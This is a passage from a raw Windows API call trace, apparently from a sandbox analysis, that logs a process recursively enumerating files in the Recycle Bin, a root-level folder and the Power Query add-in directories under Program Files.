nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="..", cAlternateFileName="")) returned 1 [0045.026] FindNextFileW (in: hFindFile=0xf58e68, lpFindFileData=0x32ef600 | out: lpFindFileData=0x32ef600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0045.026] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf58ea8 [0045.026] FindNextFileW (in: hFindFile=0xf58ea8, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.027] FindNextFileW (in: hFindFile=0xf58ea8, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.027] FindNextFileW (in: hFindFile=0xf58ea8, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0045.027] FindClose (in: hFindFile=0xf58ea8 | out: hFindFile=0xf58ea8) returned 1 [0045.027] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3320280 | out: hHeap=0x2a60000) returned 1 [0045.027] FindNextFileW (in: hFindFile=0xf58e68, lpFindFileData=0x32ef600 | out: lpFindFileData=0x32ef600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0045.027] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf58ea8 [0045.027] FindNextFileW (in: hFindFile=0xf58ea8, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.027] FindNextFileW (in: hFindFile=0xf58ea8, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.027] FindNextFileW (in: hFindFile=0xf58ea8, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0045.027] FindClose (in: hFindFile=0xf58ea8 | out: hFindFile=0xf58ea8) returned 1 [0045.027] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3320280 | out: hHeap=0x2a60000) returned 1 [0045.027] FindNextFileW (in: hFindFile=0xf58e68, lpFindFileData=0x32ef600 | out: lpFindFileData=0x32ef600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0045.027] FindClose (in: hFindFile=0xf58e68 | out: hFindFile=0xf58e68) returned 1 [0045.027] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3310278 | out: hHeap=0x2a60000) returned 1 [0045.028] FindNextFileW (in: hFindFile=0xf58e28, lpFindFileData=0x32ef884 | out: lpFindFileData=0x32ef884*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a60000, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0045.028] FindNextFileW (in: hFindFile=0xf58e28, lpFindFileData=0x32ef884 | out: lpFindFileData=0x32ef884*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a60000, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0045.028] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*", lpFindFileData=0x32ef600 | out: lpFindFileData=0x32ef600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName=".", cAlternateFileName="")) returned 0xf590a8 [0045.186] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x32ef600 | out: lpFindFileData=0x32ef600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="..", cAlternateFileName="")) returned 1 [0045.190] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x32ef600 | out: lpFindFileData=0x32ef600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1025", cAlternateFileName="")) returned 1 [0047.421] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x18157e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18157e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.421] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3f7b55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3f7b55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x54ef2e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.421] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf480feb5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf483611a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x31040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.421] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18157e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18157e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18157e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.422] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9a9d821, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9a9d821, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb0aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.422] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9a9d821, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9a9d821, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb0aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0047.422] FindClose (in: hFindFile=0xf71fc0 | out: hFindFile=0xf71fc0) returned 1 [0047.423] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.423] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x61b241f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x61b241f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca", cAlternateFileName="")) returned 1 [0047.423] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ca\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x61b241f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x61b241f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71c80 [0047.445] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x61b241f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x61b241f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.445] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4cfbc75, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4cfbc75, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.445] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x61b241f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x61b241f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x61b241f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.445] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x33040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.445] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3f46636, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3f46636, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3f46636, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8aaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.445] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3f46636, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3f46636, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3f46636, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8aaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0047.445] FindClose (in: hFindFile=0xf71c80 | out: hFindFile=0xf71c80) returned 1 [0047.446] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.446] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf134fca5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ee20e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0047.446] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\cs\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf134fca5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ee20e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf720c0 [0047.448] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf134fca5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ee20e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.448] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2ee20e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f5480d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.448] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf134fca5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf134fca5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf145ad52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x26aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.448] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb654e78, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb654e78, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb67b102, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x32aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.448] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1887f3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1887f3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ae17b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.448] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1887f3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1887f3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ae17b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0047.448] FindClose (in: hFindFile=0xf720c0 | out: hFindFile=0xf720c0) returned 1 [0047.449] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.449] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6866e01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0047.449] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\da\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6866e01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71ac0 [0047.455] FindNextFileW (in: hFindFile=0xf71ac0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6866e01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.455] FindNextFileW (in: hFindFile=0xf71ac0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x605aed7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x605aed7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6081126, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.455] FindNextFileW (in: hFindFile=0xf71ac0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56d17f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56d17f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56d17f1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x26aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.455] FindNextFileW (in: 